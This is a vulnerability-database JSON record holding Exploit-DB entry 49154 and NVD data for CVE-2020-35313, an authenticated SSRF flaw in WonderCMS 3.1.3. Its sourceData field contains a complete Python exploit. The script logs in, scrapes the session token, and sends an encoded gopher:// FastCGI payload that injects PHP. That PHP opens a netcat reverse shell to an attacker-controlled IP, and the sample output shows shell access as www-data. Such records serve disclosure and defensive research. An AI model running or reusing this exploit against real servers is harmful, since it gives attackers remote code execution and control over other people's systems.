{"id": "EDB-ID:49154", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution", "description": "", "published": "2020-12-02T00:00:00", "modified": "2020-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/49154", "reporter": "zetc0de", "references": [], "cvelist": ["CVE-2020-35313", "2020-35313"], "immutableFields": [], "lastseen": "2022-01-13T05:30:02", "viewCount": 389, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-35313"]}], "rev": 4}, "score": {"value": 6.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-35313"]}]}, "exploitation": null, "vulnersScore": 6.8}, "sourceHref": "https://www.exploit-db.com/download/49154", "sourceData": "# Exploit Title: WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution\r\n# Date: 2020-11-27\r\n# Exploit Author: zetc0de\r\n# Vendor Homepage: 
https://www.wondercms.com/\r\n# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip\r\n# Version: 3.1.3\r\n# Tested on: Ubuntu 16.04\r\n# CVE : CVE-2020-35313\r\n\r\n# WonderCMS is vulnerable to SSRF.\r\n# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.\r\n# The theme/plugin installer does not sanitize the destination of the GitHub/GitLab URL, so an attacker can point the destination to localhost.\r\n# When the attacker can point the request to localhost, this leads to an SSRF vulnerability.\r\n# The highest impact is RCE with the gopher scheme and FastCGI running on port 9000.\r\n# \r\n# python exploit.py\r\n# [+] Getting Token\r\n# [+] Sending payload\r\n# [+] Get reverse shell\r\n\r\n# nc -lnvp 1234\r\n# Connection from 192.168.43.103:56956\r\n# /bin/sh: 0: can't access tty; job control turned off\r\n# $ whoami\r\n# www-data\r\n# $\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nfrom termcolor import colored\r\nfrom time import sleep\r\n\r\nprint(colored('''\r\n\r\n\\ \\ /_ \\ \\ | _ \\ __| _ \\ __| \\ | __| \r\n \\ \\ \\ /( |. 
| | |_| / ( |\\/ |\\__ \\ \r\n \\_/\\_/\\___/_|\\_|___/___|_|_\\\\___|_| _|____/ \r\n \r\n------[ SSRF to Remote Code Execution ]------\r\n\t''',\"blue\"))\r\n\r\n\r\nloginURL = \"http://wonder.com/loginURL\"\r\npassword = \"GpIyq0RH\"\r\nlhost = \"192.168.43.66\"\r\nlport = \"1234\"\r\npayload = \"gopher://127.0.0.1:9000/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2501%2505%2505%2500%250F%2510SERVER_SOFTWAREgo%2520/%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP/1.1%250E%2503CONTENT_LENGTH132%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A//input%250F%2517SCRIPT_FILENAME/usr/share/php/PEAR.php%250D%2501DOCUMENT_ROOT/%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%2584%2504%2500%253C%253Fphp%2520system%2528%2527rm%2520/tmp/f%253Bmkfifo%2520/tmp/f%253Bcat%2520/tmp/f%257C/bin/sh%2520-i%25202%253E%25261%257Cnc%2520{}%2520{}%2520%253E/tmp/f%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500\".format(lhost,lport)\r\n\r\n\r\nr = requests.session()\r\ndata = { \"password\" : password }\r\npage = r.post(loginURL,data)\r\nif \"Wrong\" in page.text:\r\n\tprint(colored(\"[!] 
Exploit Failed : Wrong Credential\",\"red\"))\r\n\texit()\r\n\r\nprint(colored(\"[+] Getting Token\",\"cyan\"))\r\nsoup = BeautifulSoup(page.text, \"html.parser\")\r\n\r\nallscript = soup.find_all(\"script\")\r\nno = 0\r\nfor i in allscript:\r\n\tif \"rootURL\" in str(i):\r\n\t\turl = i.string.split(\"=\")[1].replace('\"','').strip(\";\").lstrip(\" \")\r\n\telif \"token\" in str(i):\r\n\t\ttoken = i.string.split(\"=\")[1].replace('\"','').strip(\";\").lstrip(\" \")\r\n\r\n\r\ndef sendPayload(req,url,payload,token):\r\n\tgetShell = url + \"?installThemePlugin=\" + payload + \"&type=plugins&token=\" + token\r\n\treq.get(getShell)\r\n\r\nprint(colored(\"[+] Sending payload\",\"cyan\"))\r\nsleep(1)\r\nprint(colored(\"[+] Get reverse shell\",\"cyan\"))\r\nsendPayload(r,url,payload,token)\r\nprint(colored(\"[+] Good bye\",\"cyan\"))", "osvdbidlist": [], "exploitType": "webapps", "verified": false, "_state": {"dependencies": 1645771703}}
{"cve": [{"lastseen": "2022-03-23T17:48:24", "description": "A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to execute arbitrary code via a crafted URL to the theme/plugin installer.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-20T20:15:00", "type": "cve", "title": "CVE-2020-35313", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35313"], "modified": "2021-04-23T21:18:00", "cpe": ["cpe:/a:wondercms:wondercms:3.1.3"], "id": "CVE-2020-35313", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35313", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:wondercms:wondercms:3.1.3:*:*:*:*:*:*:*"]}]}